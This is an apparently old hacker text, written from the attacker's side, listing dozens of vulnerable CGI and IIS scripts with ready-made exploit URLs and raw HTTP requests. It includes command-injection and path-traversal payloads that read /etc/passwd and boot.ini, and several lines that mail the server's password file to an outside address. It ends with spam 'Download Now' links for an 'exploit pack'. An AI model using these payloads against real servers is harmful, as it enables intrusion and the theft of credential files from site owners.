***NOTE: THESE EXPLOITS CAN BE PATCHED AND/OR PREVENTED, SO SOME EXPLOITS MAY NOT WORK. ALSO I AM NOT RESPONSIBLE FOR ANYTHING YOU DO AFTER READING THIS ARTICLE BLA BLA BLA . ***
Let's begin...
ALSO NOTE THAT THESE ARE NOT COPIED OFF OF AN EXPLOIT SITE AND TOOK ME A LONG TIME TO WRITE SO ENJOY!
-<>-
PHF
A script which came standard with the popular Apache web server also contained a serious flaw. Incorrect parameter checks are done, and therefore literally any command you want can be executed on the system.
Exploit:
Using the URL:
http://www.thesite.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
will display the password file from the server.
-<>-
Test-Cgi
Anyone can remotely inventory the files on a machine.
Exploit:
Using the URL: http://www.thesite.com/cgi-bin/test-cgi?*
will display the contents of the server's Cgi directory.
Using the URL: /cgi-bin/test-cgi?/*
will display the contents of the servers root directory.
Both listings will be displayed via the QUERY_STRING field, however, it is also possible to get listings via the CONTENT_TYPE, CONTENT_LENGTH, HTTP_ACCEPT, HTTP_REFERER, PATH_INFO, PATH_TRANSLATED, REQUEST_METHOD, SERVER_PROTOCOL, and (with the help of rDNS) the REMOTE_HOST field.
For example, to get a listing of the root directory via the SERVER_PROTOCOL field, you would telnet to the server on port 80 and use:
GET /cgi-bin/test-cgi?x> /*
-<>-
Fax Survey
If the HylaFAX package is installed (common on some older Linux distributions), you can send arbitrary commands running as the UID of the web server:
Exploit:
http://www.thesite.com/cgi-bin/faxsurvey?/bin/cat%20/etc/passwd
The above example URL could expose the password file of the server.
-<>-
Netauth
Netauth is a web based email management system for Windows NT and most UNIX platforms. This product contains a security hole that enables remote users to download local files, including files like /etc/shadow.
Exploit:
http://www.thesite.com/cgi-bin/netauth.cgi?cmd=show&page=../../../../../../../../../etc/passwd
The above URL would retrieve the password file from the server.
-<>-
Calender.pl
The vulnerability allows remote users to execute arbitrary commands on the web server with the privileges of the httpd process.
The calender_admin.pl script prompts the user for a configuration file to modify, and then in an attempt to authenticate the user, it passes the user input straight to perl open(). This can be easily exploited to execute arbitrary commands remotely.
Exploit:
http://www.thesite.com/cgi-bin/calender_admin.pl
Going to that URL will result in a username/password/configuration file input fields ignoring username and password, enter:
|<command here>|
(With the pipes) in the configuration file field.
For example:
|ping 127.0.0.1|
and the command will be executed.
-<>-
HTML Script
Htmlscript has a vulnerability in it which allows you to access system files, presumably any file the web server user can access.
Exploit:
http://www.thesite.com/cgi-bin/htmlscript?../../../../etc/passwd
The above URL would get the password file from the server.
-<>-
Finger
Get a list of e-mail addresses you found for the site (let's pretend one of them is "kangaroo@acme.net", and that your email address is "your@email.org")
Go to the finger box, and type this in (changing these email addresses for the real ones):
kangaroo@acme.net; /bin/mail your@email.org < etc/password
This takes the password file through kangaroo@acme.net and emails it to your email address. If this works you now have the etc/password file in your mailbox.
-<>-
classifieds.cgi
Classifieds is a free Cgi script for handling classified ads. There are multiple security holes in this that allow remote execution. Firstly, by setting your email address as something like "duke@viper.net.au</etc/password you can read files remotely off the server.
Also, by setting the hidden variables on an html form, a remote user can force arbitrary commands to be executed. One example of this is modifying the following variable:
><input type="hidden" name="mailprog" value="/usr/sbin/sendmail">
Changing its value to another command will cause that alternate command to be executed.
-<>-
WebGais
WebGais is an interface to the GAIS search tool. It installs a few programs in /cgi-bin. The main utility is called "WebGais" and does the actual interfacing with the search tool.
It reads the query from a user form, and then runs the GAIS search engine for that query. The author tried to protect the program by using single quotes around the query when he passed it to a "system" command. But he forgot one VERY important thing: to strip single quotes from the query (this was done in Glimpse).
Exploit:
Telnet target.machine.com 80
POST /cgi-bin/webgais HTTP/1.0
Content-length: 85 (replace this with the actual length of the "exploit"
line)
query=';mail+drazvan@pop3.kappa.ro</etc/passwd;echo'&output=subject&domain=paragraph
-><>-
Web Send mail
Websendmail is a Cgi-bin that comes with the WebGais package, which is an interface to the GAIS search tool. It is a PERL script that reads input from a form and sends e-mail to the specified destination.
Exploit:
Telnet target.machine.com 80
POST /cgi-bin/websendmail HTTP/1.0
Content-length: xxx (should be replaced with the actual length of the
String passed to the server, in this case xxx=90)
receiver=;mail+your_address@somewhere.org</etc/passwd;&sender=a&rtnaddr=a&subject=a&content=a
-><>-
Aglimpse
Glimpse HTTP is an interface to the Glimpse search tool, written in PERL. A hole can allow you to execute any command on the remote system (as the owner of the http server).
Exploit Example:
http://www.thesite.com/cgi-bin/aglimpse/80IFS=5;CMD=5mail5thegnome@nmrc.org <mailto:thegnome@nmrc.org>passwd;eval$CMD
-<>-
Webcom's Guestbook CGI vulnerability
Webcom's guestbook CGI application for Windows NT Web servers suffers from severe security problems that allow remote users to view local system files.
Exploit Example:
http://www.thesite.com/cgi-bin/rguest.exe?template=full-path-to-filename to receive important system files
-<>-
Webdist.cgi
A security flaw that lets anyone execute arbitrary commands with the privileges of the http daemon. (Root or nobody).
Exploit Example:
http://www.thesite.com/cgi-bin/webdist.cgi
-<>-
Wrap
This exploit allows anyone to get a listing for any directory with mode +755
Exploit Example:
http://www.thesite.com/cgi-bin/wrap
-<>-
PHP.cgi
A security flaw that lets an attacker read arbitrary files with the privileges of the http daemon. (Usually root or nobody).
Exploit Example:
http://www.thesite.com/cgi-bin/php.cgi
-<>-
Perl.exe
This exploit allows us to execute arbitrary perl code on a PC, remotely of course.
Exploit Example:
http://www.thesite.com/cgi-bin/perl.exe
-<>-
Nph-test-cgi
A security flaw that lets gets the listing of the /Cgi-Bin directory, thus discovering which Cgi�s are installed on the remote host.
Exploit Example: http://www.thesite.com/cgi-bin/ nph-test-cgi
-<>-
Nph-publish.cgi
A security flaw that lets an attacker execute arbitrary
commands with the privileges of the http daemon. (Usually root or nobody).
Exploit Example:
http://www.thesite.com/cgi-bin/nph-publish.cgi
-<>-
newdsn.exe
This great exploit allows any attacker like us the ability to create files anywhere on their system if the NTFs permissions are not tight enough, and can be used to overwrite DSNs of existing databases
Exploit Example: http://www.thesite.com/cgi-bin/scripts/tools/newdsn.exe
-<>-
JJ
A security flaw that lets an attacker execute arbitrary
commands with the privileges of the http daemon. (Usually root or nobody).
Exploit Example: http://www.thesite.com/cgi-bin/jj
-<>-
-<>-
info2www
A security flaw that lets us execute arbitrary commands with the privileges of the http daemon. (Usually root or nobody).
Exploit Example: http://www.thesite.com/cgi-bin/info2www
-<>-
Add-password.cgi
Look at the name of the pathway and go figure!
Exploit Example: http://www.thesite.com/cgi-bin/add-password.cgi
-<>-
imagemap.exe
This Cgi application is vulnerable to a buffer overflow that would allow a remote user (that would be us for all you stupid people out there) to execute arbitrary commands with the privileges of the administrators httpd server. (Either nobody or root)
Exploit Example: http://www.thesite.com/cgi-bin/imagemap.exe
-<>-
dumpenv.pl
This vulnerability gives up a lot of information about the web server configuration
Exploit Example: http://www.thesite.com/cgi-bin/dumpenv
-<>-
guestbook.pl
An exploit that would let us execute arbitrary commands with the privileges of the http daemon. (Root or nobody)
Exploit Example: http://www.thesite.com/cgi-bin/guestbook.pl
-<>-
guestbook.cgi
An exploit that would let us execute arbitrary commands with the privileges of the http daemon. (Root or nobody)
Exploit Example: http://www.thesite.com/cgi-bin/guestbook.cgi
-<>-
Campas
An exploit that would let us execute arbitrary commands with the privileges of the http daemon. (Root or nobody)
Exploit Example: http://www.thesite.com/cgi-bin/campas
-<>-
Scripts
If the /scripts directory is browsable (probably not if they know ANYTHING about security) then this would give us valuable information about which default scripts they have installed and also whether there are any custom scripts present which may have vulnerabilities
Exploit Example: http://www.thesite.com/cgi-bin/scripts
-<>-
loadpage.cgi
This exploit comes with the EZShopper 3.0 package. We can open subdirectories and/or view some sensitive file contents like user data files.
Exploit Example: http://www.thesite.com/cgi-bin/ezshopper3/loadpage.cgi?user_id=id&file=/
-<>-
search.cgi
A flaw that allows us to execute commands on the server and view files outside the web path.
http://www.thesite.com/cgi-bin/search.cgi?user_id=1&database=../../../etc/passwd&template=foo&distinct=1
-<>-
-<>-
CGI Counter
The popular CGI web page access counter version 4.0.7 by George Burgyan allows execution of arbitrary commands due to unchecked user input. Commands are executed with the same privilege as the web server, but other exploits can be used to get root access on an unpatched OS.
Exploit:
Using straight URL
http://www.example.com/cgi-bin/counterfiglet/nc/f=;echo;w;uname%20-a;id
(This will display the username of a given system)
Passing commands in a variable:
$ Telnet www.example.com www
GET /cgi-bin/counterfiglet/nc/f=;sh%20-c%20"$HTTP_X" HTTP/1.0
X: pwd;ls -la /etc;cat /etc/password
$ Telnet www.example.com www
GET /cgi-bin/counter/nl/ord/lang=English(1);system("$ENV{HTTP_X}"); HTTP/1.0
X: echo;id;uname -a;w
-<>-
SGI Infosearch
The Info search subsystem is used to search and browse virtually all SGI on-line documentation. A vulnerability has been discovered in Infosearch.Cgi which could allow any remote user to view files on the vulnerable system with privileges of the user "nobody".
-<>-
Poll It
Poll It allows easy hosting of online polls on websites. However this CGI also enables remote attackers to read any world readable file on the server.
Exploit:
http://www.thesite.com/cgi-bin/pollit/Poll_It_SSI_v2.0.cgi?data_dir=/etc/passwd
The above URL would retrieve the password file from the server.
-<>-
Robpoll
Robpoll is a free Cgi based admin program.
Exploit:
First go to:
http://www.thesite.com/cgi-bin/robpoll.cgi?Admin
You will have an option to change the password. The password by default is "Robpoll", leaving this password thus compromises the system and its files.
-<>-
WebBanner
A security hole in the WebBanner CGI enables remote attackers to view certain files on the system, and possibly execute system commands as well.
Exploit:
http://www.thesite.com/random_banner/index.cgi?image_list=alternative_image.list&html_file=../../../../../etc/passwd
The above URL will retrieve the password file from the server.
-<>-
WebWho+
WebWho+ is a free Cgi script for executing whois queries via the www. Though it does perform checks for shell escape characters on some parameters, it misses the 'type' variable and allows for malicious input to be sent to a shell. It is possible to execute arbitrary commands on a webserver running WebWho+ v1.1 with the user ID of the webserver (usually nobody).
-<>-
FormMail.pl
A serious flaw in the popular CGI program Formmail.pl allows spammers to send anonymous emails
Exploit Example:
http://www.thesite.com/cgi-bin/formmail.pl
-<>-
alibaba.pl
This exploit would allow you to have a directory listing of all files in the CGI directory. This could be used to find .pwl files and to find more directories and scripts to exploit.
Exploit Example: http://www.thesite.com/cgi-bin/alibaba.pl|dir
-<>-
input.bat
This exploit would let you execute arbitrary commands
Exploit Example: http://www.thesite.com/cgi-bin/input.bat?|dir....windows
-<>-
bigconf.cgi
A security flaw that lets us execute arbitrary commands with the privileges of the http daemon. (Usually root or nobody).
Exploit Example: http://www.thesite.com/cgi-bin/bigconf.cgi
-<>-
-<>-
tst.bat
This flaw in tst.bat would allow us to read arbitrary files on a remote system
Exploit Example: http://www.thesite.com/cgi-bin/tst.bat
-<>-
idq.dll
This exploit would allow us to read arbitrary files on a remote system
Exploit Example: http://www.thesite.com/query.idq?CiTemplate=../../../somefile.ext
-<>-
FormHandler.cgi
The FormHandler CGI utility may allow us to download any file from vulnerable systems.
Exploit Example: http://www.thesite.com/formhandler.cgi
-<>-
showcode.asp
A sample Active Server Page (ASP) script installed by default on Microsoft's Internet Information Server (IIS) 4.0 would give us access to view any file on the same volume as the web server that is readable by the web server.
Exploit Example: http://www.thesite.com/msadc/Samples/SELECTOR/showcode.asp
-<>-
codebrws.asp
This exploit would allow us to view source of any file in the web root with the extensions .asp .inc .htm or .html
Exploit Example: http://www.thesite.com/iissamples/exair/howitworks/codebrws.asp
-<>-
htimage.exe
There is a buffer overflow in the remote htimage.exe when it is given the following request:
Exploit Example: http://www.thesite.com/cgi-bin/htimage.exe/AAAA[....]AAA?0,0
-<>-
wguest.exe
A request for http://www.thesite.com/cgi-bin/wguest.exe?template=c:boot.ini will return the remote web servers boot.ini file
Exploit Example: http://www.thesite.com/cgi-bin/wguest.exe?template=c:boot.ini
-<>-
uploader.exe
A security flaw that lets anyone upload arbitrary Cgi on the server, and then execute them.
Exploit Example: http://www.thesite.com/cgi-bin/uploader.exe
-<>-
search97.vts
This exploit can be used to remotely view any file on a web server.
Exploit Example: http://www.thesite.com/cgi-bin/search97.vts
-<>-
rguest.exe
This exploit will return with the $winnt$.inf file.
Exploit Example: http://www.thesite.com/cgi-bin/rguest.exe?template=c:winntsystem32$winnt$.inf
-<>-
pfdispaly.cgi
This exploit would allow us to view files on a vulnerable system with the privileges of the user
If exploited, may allow any user to view files on a vulnerable system with privileges of the user. (Usually root or nobody)
Exploit Example: http//www.thesite.com/cgi-bin/pfdisplay.cgi
-<>-
Man.sh
This exploit would allow anyone who can execute Cgi thru you web browser run any system commands with the user id of the web server and obtain the output from them in a web page.
Exploit Example: http://www.thesite.com/cgi-bin/man.sh
-<>-
/scripts/issadmin/bdir.htr
The file bdir.htr is a default IIS file which can give us a lot of unnecessary information about
a file system.
http://www.thesite.com/scripts/iisadmin/bdir.htr??c:
-<>-
Count.cgi
A buffer can be overflowed in the Count.cgi program, allowing remote http users to execute arbitrary commands on the target machine.
Exploit Example: http://www.thesite.com/cgi-bin/Count.cgi
-<>-
CGImail.exe
An exploit that we can use to gain access to confidential
data or further escalate our privileges.
Exploit Example: http://www.thesite.com/scripts/CGImail.exe
-<>-
carbo.dll
This exploit can be used to remotely view any file on their web server.
Exploit Example: http://www.thesite.com/carbo.dll?icatcommand=file_to_view&catalogname=catalog
-<>-
args.bat
A security flaw that lets an attacker upload arbitrary files on the remote web server.
Exploit Example: http://www.thesite.com/cgi-bin/args.bat
-<>-
AnyForm2
This exploit can be used by us to email the web server's password file back to us.
Exploit Example: http://www.thesite.com/cgi-bin/AnyForm2
-<>-
get32.exe
A security flaw that lets anyone execute arbitrary commands with the privileges of the http daemon. (Root or nobody).
Exploit Example: http://www.thesite.com/cgi-bin/get32.exe
-<>-
Ews
A security flaw that lets anyone execute arbitrary commands with the privileges of the http daemon. (Root or nobody).
Exploit Example: http://www.thesite.com/cgi-bin/ews
-<>-
exprcalc.cfm
This exploit would allow us to view, delete and upload anything on a remote ColdFusion Application Server
Exploit Example: http://www.thesite.com/cfdocs/expeval/exprcalc.cfm
-<>-
ExAir
IIS comes with the sample site ExAir. The page /iissamples/exair/search/advsearch.asp
could be used to make IIS hang, thus preventing it from answering legitimate client requests.
Exploit Example: http://www.thesite.com/iissamples/exair/search/advsearch.asp
-<>-
ExAir
IIS comes with the sample site ExAir. The page /iissamples/exair/search/query.asp
could be used to make IIS hang, thus preventing it from answering legitimate client requests.
Exploit Example: http://www.thesite.com/iissamples/exair/search/query.asp
-<>-
ExAir
IIS comes with the sample site ExAir. The page /iissamples/exair/search/search.asp
could be used to make IIS hang, thus preventing it from answering legitimate client requests.
Exploit Example: http://www.thesite.com/iissamples/exair/search/search.asp
-<>-
Altavista
It would be possible to read the contents of any files on the remote host by using the Altavista Intranet Search Service, and performing the request below.
Exploit Example: GET http://www.thesite.com/cgi-bin/query?mss=%2e%2e/config
-<>-
input2.bat
It is possible to misuse this .bat file to make the remote server execute arbitrary commands.
Exploit Example: http://www.thesite.com/cgi-bin/input2.bat?|dir....windows
-<>-
envout.bat
It is possible to misuse this .bat file to make the remote server execute arbitrary commands.
Exploit Example: http://www.thesite.com/ssi/envout.bat
-<>-
/cd/../config/html/cnf_gi.htm
It is possible to access the remote host AxisStorpoint configuration with this exploit
Exploit Example: http://www.thesite.com/cd/../config/html/cnf_gi.htm
-<>-
cachemgr.cgi
RedHat Linux 6.0 installs a default squid cache manager with not restricted access permissions. This script could be used to perform a port scan from the Cgi-host machine.
Exploit Example: http://www.thesite.com/cgi-bin/cachemgr.cgi
-<>-
Remote web root
It was possible to get the location of a virtual web directory of a host by issuing the command below.
Exploit Example: GET http://www.thesite.com/cgi-bin/ls HTTP/1.0
-<>-
CGI
This is a very no brainer exploit. Is the Cgi-bin browsable? Is sounds stupid but some people are stupid. Remember that.
Exploit Example: http://www.thesite.com/Cgi-Bin
-<>-
cgitest.exe
There is a buffer overrun in the cgitest.exe, which will allow us to execute arbitrary commands with the same privileges as the web server (root or nobody).
Exploit Example: http://www.thesite.com/cgi-bin/cgitest.exe
-<>-
ExprCalc.cfm
To display and delete any file on the system use an URL of the following form below:
Exploit Example: http://www.thesite.com/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=C:thetargetfile
-<>-
getdrvrs.exe
Get the drivers from the Site.
Exploit Example: http://www.thesite.com/scripts/tools/getdrvrs.exe
-<>-
bnbform.cgi
Remote users can read arbitrary files on the file system.
Exploit Example: http://www.thesite.com/Cgi-Bin/bnbform.cgi
-<>-
survey.cgi
Remote users can execute commands with web server privileges
Exploit Example: http://www.thesite.com/Cgi-bin/survey.cgi
-<>-
.htaccess
This exploit would allow you to read files protected with .htaccess
http://www.thegnome.com/secure/.htaccess
-<>-
convert.bas
This exploit would allow you to read any file on the remote file system.
Exploit Example:
http://thesite.com/scripts/convert.bas?../anythingyouwanttoview
-<>-
THANKS FOR READING!!!!
Comple Cgi Script Exploit Pack >>>>> Download Now
ReplyDelete>>>>> Download Full
Comple Cgi Script Exploit Pack >>>>> Download LINK
>>>>> Download Now
Comple Cgi Script Exploit Pack >>>>> Download Full
>>>>> Download LINK TK